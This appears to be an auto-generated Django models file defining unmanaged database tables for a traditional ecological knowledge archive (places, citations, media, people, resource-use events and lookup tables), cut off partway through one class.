2022-01-07T02:54:41.000Z
|
docs/Data/models_new_fk.py
|
Ecotrust/TEKDB
|
c92500aa9c8271398721bf069b93d63d11510529
|
[
"MIT"
] | 134
|
2017-02-13T23:26:26.000Z
|
2020-09-24T23:13:02.000Z
|
docs/Data/models_new_fk.py
|
Ecotrust/TEKDB
|
c92500aa9c8271398721bf069b93d63d11510529
|
[
"MIT"
] | 2
|
2018-03-02T04:01:16.000Z
|
2019-11-06T01:51:49.000Z
|
# This is an auto-generated Django model module.
# You'll have to do the following manually to clean this up:
# * Rearrange models' order
# * Make sure each model has one field with primary_key=True
# * Remove `managed = False` lines if you wish to allow Django to create, modify, and delete the table
# Feel free to rename the models, but don't rename db_table values or field names.
#
# Also note: You'll have to insert the output of 'django-admin sqlcustom [app_label]'
# into your database.
from __future__ import unicode_literals
from django.db import models
class Citations(models.Model):
citationid = models.ForeignKey('Placescitationevents', db_column='CitationID', primary_key=True) # Field name made lowercase.
referencetype = models.CharField(db_column='ReferenceType', max_length=255, blank=True, null=True) # Field name made lowercase.
referencetext = models.CharField(db_column='ReferenceText', max_length=50, blank=True, null=True) # Field name made lowercase.
authortype = models.CharField(db_column='AuthorType', max_length=255, blank=True, null=True) # Field name made lowercase.
authorprimary = models.CharField(db_column='AuthorPrimary', max_length=255, blank=True, null=True) # Field name made lowercase.
authorsecondary = models.CharField(db_column='AuthorSecondary', max_length=255, blank=True, null=True) # Field name made lowercase.
intervieweeid = models.IntegerField(db_column='IntervieweeID', blank=True, null=True) # Field name made lowercase.
interviewerid = models.IntegerField(db_column='InterviewerID', blank=True, null=True) # Field name made lowercase.
placeofinterview = models.CharField(db_column='PlaceofInterview', max_length=255, blank=True, null=True) # Field name made lowercase.
year = models.IntegerField(db_column='Year', blank=True, null=True) # Field name made lowercase.
title = models.TextField(db_column='Title', blank=True, null=True) # Field name made lowercase.
seriestitle = models.CharField(db_column='SeriesTitle', max_length=255, blank=True, null=True) # Field name made lowercase.
seriesvolume = models.CharField(db_column='SeriesVolume', max_length=50, blank=True, null=True) # Field name made lowercase.
serieseditor = models.CharField(db_column='SeriesEditor', max_length=255, blank=True, null=True) # Field name made lowercase.
publisher = models.CharField(db_column='Publisher', max_length=100, blank=True, null=True) # Field name made lowercase.
publishercity = models.CharField(db_column='PublisherCity', max_length=255, blank=True, null=True) # Field name made lowercase.
preparedfor = models.CharField(db_column='PreparedFor', max_length=100, blank=True, null=True) # Field name made lowercase.
comments = models.TextField(db_column='Comments', blank=True, null=True) # Field name made lowercase.
enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True) # Field name made lowercase.
enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True) # Field name made lowercase.
modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True) # Field name made lowercase.
modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'citations'
class Currentversion(models.Model):
    # Auto-generated (inspectdb) model: tracks deployed backend/frontend
    # schema version numbers in the legacy 'currentversion' table.
    id = models.IntegerField(db_column='ID', primary_key=True)  # Field name made lowercase.
    backendversion = models.IntegerField(db_column='BackendVersion', blank=True, null=True)  # Field name made lowercase.
    frontendversion = models.IntegerField(db_column='FrontendVersion', blank=True, null=True)  # Field name made lowercase.
    class Meta:
        managed = False  # pre-existing table; Django does not migrate it
        db_table = 'currentversion'
class Locality(models.Model):
localityid = models.IntegerField(db_column='LocalityID', primary_key=True) # Field name made lowercase.
placeid = models.ForeignKey('Places', db_column='PlaceID', blank=True, null=True) # Field name made lowercase.
englishname = models.CharField(db_column='EnglishName', max_length=255, blank=True, null=True) # Field name made lowercase.
indigenousname = models.CharField(db_column='IndigenousName', max_length=255, blank=True, null=True) # Field name made lowercase.
localitytype = models.CharField(db_column='LocalityType', max_length=255, blank=True, null=True) # Field name made lowercase.
enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True) # Field name made lowercase.
enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True) # Field name made lowercase.
modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True) # Field name made lowercase.
modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'locality'
class Localitygisselections(models.Model):
localityid = models.IntegerField(db_column='LocalityID', blank=True, null=True) # Field name made lowercase.
localitylabel = models.CharField(db_column='LocalityLabel', max_length=255, blank=True, null=True) # Field name made lowercase.
sourcefc = models.CharField(db_column='SourceFC', max_length=255, blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'localitygisselections'
class Localityplaceresourceevent(models.Model):
placeresourceid = models.ForeignKey('Placesresourceevents', db_column='PlaceResourceID') # Field name made lowercase.
localityid = models.ForeignKey(Locality, db_column='LocalityID') # Field name made lowercase.
enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True) # Field name made lowercase.
enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True) # Field name made lowercase.
modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True) # Field name made lowercase.
modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True) # Field name made lowercase.
modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'localityplaceresourceevent'
unique_together = (('placeresourceid', 'localityid'),)
class Lookupactivity(models.Model):
    # Auto-generated lookup table: the activity string itself is the
    # primary key of 'lookupactivity'.
    activity = models.CharField(db_column='Activity', primary_key=True, max_length=255)  # Field name made lowercase.
    class Meta:
        managed = False  # pre-existing table; Django does not migrate it
        db_table = 'lookupactivity'
class Lookupauthortype(models.Model):
    # Auto-generated lookup table of author types. NOTE(review): unlike the
    # other lookup models this uses unique=True rather than primary_key=True,
    # so Django adds an implicit autoincrement `id` primary key — confirm
    # that matches the actual 'lookupauthortype' schema.
    authortype = models.CharField(db_column='AuthorType', unique=True, max_length=50)  # Field name made lowercase.
    class Meta:
        managed = False  # pre-existing table; Django does not migrate it
        db_table = 'lookupauthortype'
class Lookupcustomaryuse(models.Model):
usedfor = models.CharField(db_column='UsedFor', primary_key=True, max_length=255) # Field name made lowercase.
class Meta:
managed = False
db_table = 'lookupcustomaryuse'
class Lookuphabitat(models.Model):
habitat = models.CharField(db_column='Habitat', primary_key=True, max_length=100) # Field name made lowercase.
class Meta:
managed = False
db_table = 'lookuphabitat'
class Lookuplocalitytype(models.Model):
localitytype = models.CharField(db_column='LocalityType', primary_key=True, max_length=255) # Field name made lowercase.
class Meta:
managed = False
db_table = 'lookuplocalitytype'
class Lookupmediatype(models.Model):
mediatype = models.CharField(db_column='MediaType', primary_key=True, max_length=255) # Field name made lowercase.
mediacategory = models.CharField(db_column='MediaCategory', max_length=255, blank=True, null=True) # Field name made lowercase.
class Meta:
managed = False
db_table = 'lookupmediatype'
class Lookupparticipants(models.Model):
participants = models.CharField(db_column='Participants', primary_key=True, max_length=255) # Field name made lowercase.
class Meta:
managed = False
db_table = 'lookupparticipants'
class Lookuppartused(models.Model):
partused = models.CharField(db_column='PartUsed', primary_key=True, max_length=255) # Field name made lowercase.
class Meta:
managed = False
db_table = 'lookuppartused'
class Lookupplanningunit(models.Model):
    """Lookup table of planning units, keyed by integer ID (unmanaged)."""
    planningunitid = models.IntegerField(db_column='PlanningUnitID', primary_key=True)  # Field name made lowercase.
    planningunitname = models.CharField(db_column='PlanningUnitName', max_length=100, blank=True, null=True)  # Field name made lowercase.

    class Meta:
        managed = False  # table is owned by the legacy database, not migrations
        db_table = 'lookupplanningunit'
class Lookupreferencetype(models.Model):
    """Lookup table of citation/reference document types (unmanaged)."""
    documenttype = models.CharField(db_column='DocumentType', primary_key=True, max_length=25)  # Field name made lowercase.

    class Meta:
        managed = False  # table is owned by the legacy database, not migrations
        db_table = 'lookupreferencetype'
class Lookupresourcegroup(models.Model):
    """Lookup table of resource classification groups (unmanaged)."""
    resourceclassificationgroup = models.CharField(db_column='ResourceClassificationGroup', primary_key=True, max_length=255)  # Field name made lowercase.

    class Meta:
        managed = False  # table is owned by the legacy database, not migrations
        db_table = 'lookupresourcegroup'
class Lookupseason(models.Model):
    """Lookup table of seasons (unmanaged legacy table)."""
    season = models.CharField(db_column='Season', primary_key=True, max_length=255)  # Field name made lowercase.

    class Meta:
        managed = False  # table is owned by the legacy database, not migrations
        db_table = 'lookupseason'
class Lookuptechniques(models.Model):
    """Lookup table of harvest/use techniques (unmanaged legacy table)."""
    techniques = models.CharField(db_column='Techniques', primary_key=True, max_length=255)  # Field name made lowercase.

    class Meta:
        managed = False  # table is owned by the legacy database, not migrations
        db_table = 'lookuptechniques'
class Lookuptiming(models.Model):
    """Lookup table of timing values (unmanaged legacy table)."""
    timing = models.CharField(db_column='Timing', primary_key=True, max_length=255)  # Field name made lowercase.

    class Meta:
        managed = False  # table is owned by the legacy database, not migrations
        db_table = 'lookuptiming'
class Lookuptribe(models.Model):
    """Lookup table of tribes and their federal designations (unmanaged)."""
    id = models.IntegerField(db_column='ID', primary_key=True)  # Field name made lowercase.
    tribeunit = models.CharField(db_column='TribeUnit', max_length=50, blank=True, null=True)  # Field name made lowercase.
    tribe = models.CharField(db_column='Tribe', max_length=100, blank=True, null=True)  # Field name made lowercase.
    federaltribe = models.CharField(db_column='FederalTribe', max_length=100, blank=True, null=True)  # Field name made lowercase.

    class Meta:
        managed = False  # table is owned by the legacy database, not migrations
        db_table = 'lookuptribe'
class Lookupuserinfo(models.Model):
    """Lookup table of user display info (unmanaged legacy table)."""
    # No explicit primary_key field: Django will assume an implicit `id`
    # AutoField column — TODO confirm it exists in the legacy table.
    username = models.CharField(db_column='UserName', max_length=100, blank=True, null=True)  # Field name made lowercase.
    usingcustomusername = models.IntegerField(db_column='UsingCustomUsername')  # Field name made lowercase.
    usertitle = models.CharField(db_column='UserTitle', max_length=100, blank=True, null=True)  # Field name made lowercase.
    useraffiliation = models.CharField(db_column='UserAffiliation', max_length=100, blank=True, null=True)  # Field name made lowercase.

    class Meta:
        managed = False  # table is owned by the legacy database, not migrations
        db_table = 'lookupuserinfo'
class Media(models.Model):
    """A media item (name, description, link) in the legacy `media` table."""
    mediaid = models.IntegerField(db_column='MediaID', primary_key=True)  # Field name made lowercase.
    mediatype = models.CharField(db_column='MediaType', max_length=255, blank=True, null=True)  # Field name made lowercase.
    medianame = models.CharField(db_column='MediaName', max_length=255, blank=True, null=True)  # Field name made lowercase.
    mediadescription = models.TextField(db_column='MediaDescription', blank=True, null=True)  # Field name made lowercase.
    medialink = models.CharField(db_column='MediaLink', max_length=255, blank=True, null=True)  # Field name made lowercase.
    # Audit-trail columns common to most tables in this schema.
    enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True)  # Field name made lowercase.
    enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True)  # Field name made lowercase.
    enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True)  # Field name made lowercase.
    enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True)  # Field name made lowercase.
    modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True)  # Field name made lowercase.
    modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True)  # Field name made lowercase.
    modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True)  # Field name made lowercase.
    modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True)  # Field name made lowercase.

    class Meta:
        managed = False  # table is owned by the legacy database, not migrations
        db_table = 'media'
class Mediacitationevents(models.Model):
    """Join table relating Media rows to Citations rows (unmanaged).

    The table's natural key is (mediaid, citationid); Django still assumes
    an implicit `id` column — TODO confirm against the legacy schema.
    """
    # `on_delete` is required on ForeignKey since Django 2.0. DO_NOTHING is the
    # inspectdb convention for unmanaged tables: referential integrity is left
    # to the database itself.
    mediaid = models.ForeignKey(Media, on_delete=models.DO_NOTHING, db_column='MediaID')  # Field name made lowercase.
    citationid = models.ForeignKey(Citations, on_delete=models.DO_NOTHING, db_column='CitationID')  # Field name made lowercase.
    relationshipdescription = models.CharField(db_column='RelationshipDescription', max_length=255, blank=True, null=True)  # Field name made lowercase.
    pages = models.CharField(db_column='Pages', max_length=255, blank=True, null=True)  # Field name made lowercase.
    # Audit-trail columns common to most tables in this schema.
    enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True)  # Field name made lowercase.
    enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True)  # Field name made lowercase.
    enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True)  # Field name made lowercase.
    enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True)  # Field name made lowercase.
    modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True)  # Field name made lowercase.
    modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True)  # Field name made lowercase.
    modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True)  # Field name made lowercase.
    modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True)  # Field name made lowercase.

    class Meta:
        managed = False  # table is owned by the legacy database, not migrations
        db_table = 'mediacitationevents'
        unique_together = (('mediaid', 'citationid'),)
class People(models.Model):
    """A person recorded in the legacy `people` table."""
    personid = models.IntegerField(db_column='PersonID', primary_key=True)  # Field name made lowercase.
    firstname = models.CharField(db_column='FirstName', max_length=255, blank=True, null=True)  # Field name made lowercase.
    lastname = models.CharField(db_column='LastName', max_length=255, blank=True, null=True)  # Field name made lowercase.
    yearborn = models.IntegerField(db_column='YearBorn', blank=True, null=True)  # Field name made lowercase.
    village = models.CharField(db_column='Village', max_length=255, blank=True, null=True)  # Field name made lowercase.
    relationshiptootherpeople = models.TextField(db_column='RelationshipToOtherPeople', blank=True, null=True)  # Field name made lowercase.

    class Meta:
        managed = False  # table is owned by the legacy database, not migrations
        db_table = 'people'
class Placealtindigenousname(models.Model):
    """Alternate indigenous name for a place (unmanaged legacy table)."""
    altindigenousnameid = models.IntegerField(db_column='AltIndigenousNameID', primary_key=True)  # Field name made lowercase.
    # Plain integer rather than a ForeignKey to Places — presumably a soft
    # reference; confirm before adding a DB-level constraint.
    placeid = models.IntegerField(db_column='PlaceID', blank=True, null=True)  # Field name made lowercase.
    altindigenousname = models.CharField(db_column='AltIndigenousName', max_length=255, blank=True, null=True)  # Field name made lowercase.

    class Meta:
        managed = False  # table is owned by the legacy database, not migrations
        db_table = 'placealtindigenousname'
class Placegisselections(models.Model):
    """GIS feature-class selection for a place (unmanaged legacy table)."""
    # No explicit primary_key field: Django will assume an implicit `id`
    # AutoField column — TODO confirm it exists in the legacy table.
    placeid = models.IntegerField(db_column='PlaceID', blank=True, null=True)  # Field name made lowercase.
    placelabel = models.CharField(db_column='PlaceLabel', max_length=255, blank=True, null=True)  # Field name made lowercase.
    sourcefc = models.CharField(db_column='SourceFC', max_length=255, blank=True, null=True)  # Field name made lowercase.

    class Meta:
        managed = False  # table is owned by the legacy database, not migrations
        db_table = 'placegisselections'
class Places(models.Model):
    """A named place (indigenous and English names) in the legacy `places` table."""
    placeid = models.IntegerField(db_column='PlaceID', primary_key=True)  # Field name made lowercase.
    indigenousplacename = models.CharField(db_column='IndigenousPlaceName', max_length=255, blank=True, null=True)  # Field name made lowercase.
    indigenousplacenamemeaning = models.CharField(db_column='IndigenousPlaceNameMeaning', max_length=255, blank=True, null=True)  # Field name made lowercase.
    englishplacename = models.CharField(db_column='EnglishPlaceName', max_length=255, blank=True, null=True)  # Field name made lowercase.
    # Soft references (plain integers) into lookup tables — not ForeignKeys.
    planningunitid = models.IntegerField(db_column='PlanningUnitID', blank=True, null=True)  # Field name made lowercase.
    primaryhabitat = models.CharField(db_column='PrimaryHabitat', max_length=100, blank=True, null=True)  # Field name made lowercase.
    tribeid = models.IntegerField(db_column='TribeID', blank=True, null=True)  # Field name made lowercase.
    # Integer flag (0/1) rather than BooleanField — matches the legacy column.
    islocked = models.IntegerField(db_column='IsLocked')  # Field name made lowercase.
    # Audit-trail columns common to most tables in this schema.
    enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True)  # Field name made lowercase.
    enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True)  # Field name made lowercase.
    enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True)  # Field name made lowercase.
    enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True)  # Field name made lowercase.
    modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True)  # Field name made lowercase.
    modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True)  # Field name made lowercase.
    modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True)  # Field name made lowercase.
    modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True)  # Field name made lowercase.

    class Meta:
        managed = False  # table is owned by the legacy database, not migrations
        db_table = 'places'
class Placescitationevents(models.Model):
    """Join table relating Places rows to citations (unmanaged).

    Natural key is (placeid, citationid); Django still assumes an implicit
    `id` column — TODO confirm against the legacy schema.
    """
    # `on_delete` is required on ForeignKey since Django 2.0. DO_NOTHING is the
    # inspectdb convention for unmanaged tables.
    placeid = models.ForeignKey(Places, on_delete=models.DO_NOTHING, db_column='PlaceID')  # Field name made lowercase.
    citationid = models.IntegerField(db_column='CitationID')  # Field name made lowercase.
    relationshipdescription = models.CharField(db_column='RelationshipDescription', max_length=255, blank=True, null=True)  # Field name made lowercase.
    pages = models.CharField(db_column='Pages', max_length=255, blank=True, null=True)  # Field name made lowercase.
    # Audit-trail columns common to most tables in this schema.
    enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True)  # Field name made lowercase.
    enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True)  # Field name made lowercase.
    enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True)  # Field name made lowercase.
    enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True)  # Field name made lowercase.
    modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True)  # Field name made lowercase.
    modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True)  # Field name made lowercase.
    modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True)  # Field name made lowercase.
    modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True)  # Field name made lowercase.

    class Meta:
        managed = False  # table is owned by the legacy database, not migrations
        db_table = 'placescitationevents'
        unique_together = (('placeid', 'citationid'),)
class Placesmediaevents(models.Model):
    """Join table relating Places rows to Media rows (unmanaged).

    Natural key is (placeid, mediaid); Django still assumes an implicit
    `id` column — TODO confirm against the legacy schema.
    """
    # `on_delete` is required on ForeignKey since Django 2.0. DO_NOTHING is the
    # inspectdb convention for unmanaged tables.
    placeid = models.ForeignKey(Places, on_delete=models.DO_NOTHING, db_column='PlaceID')  # Field name made lowercase.
    mediaid = models.ForeignKey(Media, on_delete=models.DO_NOTHING, db_column='MediaID')  # Field name made lowercase.
    relationshipdescription = models.CharField(db_column='RelationshipDescription', max_length=255, blank=True, null=True)  # Field name made lowercase.
    pages = models.CharField(db_column='Pages', max_length=50, blank=True, null=True)  # Field name made lowercase.
    # Audit-trail columns common to most tables in this schema.
    enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True)  # Field name made lowercase.
    enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True)  # Field name made lowercase.
    enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True)  # Field name made lowercase.
    enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True)  # Field name made lowercase.
    modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True)  # Field name made lowercase.
    modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True)  # Field name made lowercase.
    modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True)  # Field name made lowercase.
    modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True)  # Field name made lowercase.

    class Meta:
        managed = False  # table is owned by the legacy database, not migrations
        db_table = 'placesmediaevents'
        unique_together = (('placeid', 'mediaid'),)
class Placesresourcecitationevents(models.Model):
    """Join table relating place-resource events to citations (unmanaged).

    Natural key is (placeresourceid, citationid); Django still assumes an
    implicit `id` column — TODO confirm against the legacy schema.
    """
    # `on_delete` is required on ForeignKey since Django 2.0. DO_NOTHING is the
    # inspectdb convention for unmanaged tables. The string target is used
    # because Placesresourceevents is declared later in the module.
    placeresourceid = models.ForeignKey('Placesresourceevents', on_delete=models.DO_NOTHING, db_column='PlaceResourceID')  # Field name made lowercase.
    citationid = models.IntegerField(db_column='CitationID')  # Field name made lowercase.
    relationshipdescription = models.CharField(db_column='RelationshipDescription', max_length=255, blank=True, null=True)  # Field name made lowercase.
    pages = models.CharField(db_column='Pages', max_length=255, blank=True, null=True)  # Field name made lowercase.
    # Audit-trail columns common to most tables in this schema.
    enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True)  # Field name made lowercase.
    enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True)  # Field name made lowercase.
    enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True)  # Field name made lowercase.
    enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True)  # Field name made lowercase.
    modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True)  # Field name made lowercase.
    modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True)  # Field name made lowercase.
    modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True)  # Field name made lowercase.
    modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True)  # Field name made lowercase.

    class Meta:
        managed = False  # table is owned by the legacy database, not migrations
        db_table = 'placesresourcecitationevents'
        unique_together = (('placeresourceid', 'citationid'),)
class Placesresourceevents(models.Model):
    """A resource-at-place event: which resource is used at which place,
    how, and in which months/seasons (unmanaged legacy table)."""
    placeresourceid = models.IntegerField(db_column='PlaceResourceID', primary_key=True)  # Field name made lowercase.
    # `on_delete` is required on ForeignKey since Django 2.0. DO_NOTHING is the
    # inspectdb convention for unmanaged tables.
    placeid = models.ForeignKey(Places, on_delete=models.DO_NOTHING, db_column='PlaceID', blank=True, null=True)  # Field name made lowercase.
    resourceid = models.IntegerField(db_column='ResourceID', blank=True, null=True)  # Field name made lowercase.
    relationshipdescription = models.CharField(db_column='RelationshipDescription', max_length=255, blank=True, null=True)  # Field name made lowercase.
    partused = models.CharField(db_column='PartUsed', max_length=255, blank=True, null=True)  # Field name made lowercase.
    customaryuse = models.CharField(db_column='CustomaryUse', max_length=255, blank=True, null=True)  # Field name made lowercase.
    barterresource = models.IntegerField(db_column='BarterResource')  # Field name made lowercase.
    season = models.CharField(db_column='Season', max_length=255, blank=True, null=True)  # Field name made lowercase.
    timing = models.CharField(db_column='Timing', max_length=255, blank=True, null=True)  # Field name made lowercase.
    # One integer flag column per month — mirrors the legacy schema exactly.
    january = models.IntegerField(db_column='January')  # Field name made lowercase.
    february = models.IntegerField(db_column='February')  # Field name made lowercase.
    march = models.IntegerField(db_column='March')  # Field name made lowercase.
    april = models.IntegerField(db_column='April')  # Field name made lowercase.
    may = models.IntegerField(db_column='May')  # Field name made lowercase.
    june = models.IntegerField(db_column='June')  # Field name made lowercase.
    july = models.IntegerField(db_column='July')  # Field name made lowercase.
    august = models.IntegerField(db_column='August')  # Field name made lowercase.
    september = models.IntegerField(db_column='September')  # Field name made lowercase.
    october = models.IntegerField(db_column='October')  # Field name made lowercase.
    november = models.IntegerField(db_column='November')  # Field name made lowercase.
    december = models.IntegerField(db_column='December')  # Field name made lowercase.
    year = models.SmallIntegerField(db_column='Year', blank=True, null=True)  # Field name made lowercase.
    islocked = models.IntegerField(db_column='IsLocked')  # Field name made lowercase.
    # Audit-trail columns common to most tables in this schema.
    enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True)  # Field name made lowercase.
    enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True)  # Field name made lowercase.
    enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True)  # Field name made lowercase.
    enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True)  # Field name made lowercase.
    modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True)  # Field name made lowercase.
    modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True)  # Field name made lowercase.
    modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True)  # Field name made lowercase.
    modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True)  # Field name made lowercase.

    class Meta:
        managed = False  # table is owned by the legacy database, not migrations
        db_table = 'placesresourceevents'
class Placesresourcemediaevents(models.Model):
    """Join table relating place-resource events to media (unmanaged).

    Natural key is (placeresourceid, mediaid); Django still assumes an
    implicit `id` column — TODO confirm against the legacy schema.
    """
    # `on_delete` is required on ForeignKey since Django 2.0. DO_NOTHING is the
    # inspectdb convention for unmanaged tables.
    placeresourceid = models.ForeignKey(Placesresourceevents, on_delete=models.DO_NOTHING, db_column='PlaceResourceID')  # Field name made lowercase.
    mediaid = models.IntegerField(db_column='MediaID')  # Field name made lowercase.
    relationshipdescription = models.CharField(db_column='RelationshipDescription', max_length=255, blank=True, null=True)  # Field name made lowercase.
    pages = models.CharField(db_column='Pages', max_length=50, blank=True, null=True)  # Field name made lowercase.
    # Audit-trail columns common to most tables in this schema.
    enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True)  # Field name made lowercase.
    enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True)  # Field name made lowercase.
    enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True)  # Field name made lowercase.
    enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True)  # Field name made lowercase.
    modifiedbyname = models.CharField(db_column='ModifiedByName', max_length=25, blank=True, null=True)  # Field name made lowercase.
    modifiedbytitle = models.CharField(db_column='ModifiedByTitle', max_length=100, blank=True, null=True)  # Field name made lowercase.
    modifiedbytribe = models.CharField(db_column='ModifiedByTribe', max_length=100, blank=True, null=True)  # Field name made lowercase.
    modifiedbydate = models.DateTimeField(db_column='ModifiedByDate', blank=True, null=True)  # Field name made lowercase.

    class Meta:
        managed = False  # table is owned by the legacy database, not migrations
        db_table = 'placesresourcemediaevents'
        unique_together = (('placeresourceid', 'mediaid'),)
class Resourceactivitycitationevents(models.Model):
    """Join table relating resource-activity events to citations (unmanaged).

    Natural key is (resourceactivityid, citationid); Django still assumes an
    implicit `id` column — TODO confirm against the legacy schema.
    """
    # `on_delete` is required on ForeignKey since Django 2.0. DO_NOTHING is the
    # inspectdb convention for unmanaged tables. String target: the model is
    # declared later in the module.
    resourceactivityid = models.ForeignKey('Resourcesactivityevents', on_delete=models.DO_NOTHING, db_column='ResourceActivityID')  # Field name made lowercase.
    citationid = models.IntegerField(db_column='CitationID')  # Field name made lowercase.
    relationshipdescription = models.CharField(db_column='RelationshipDescription', max_length=255, blank=True, null=True)  # Field name made lowercase.
    pages = models.CharField(db_column='Pages', max_length=255, blank=True, null=True)  # Field name made lowercase.
    # Audit-trail columns common to most tables in this schema.
    enteredbyname = models.CharField(db_column='EnteredByName', max_length=25, blank=True, null=True)  # Field name made lowercase.
    enteredbytribe = models.CharField(db_column='EnteredByTribe', max_length=100, blank=True, null=True)  # Field name made lowercase.
    enteredbytitle = models.CharField(db_column='EnteredByTitle', max_length=100, blank=True, null=True)  # Field name made lowercase.
    enteredbydate = models.DateTimeField(db_column='EnteredByDate', blank=True, null=True)  # Field name made lowercase.
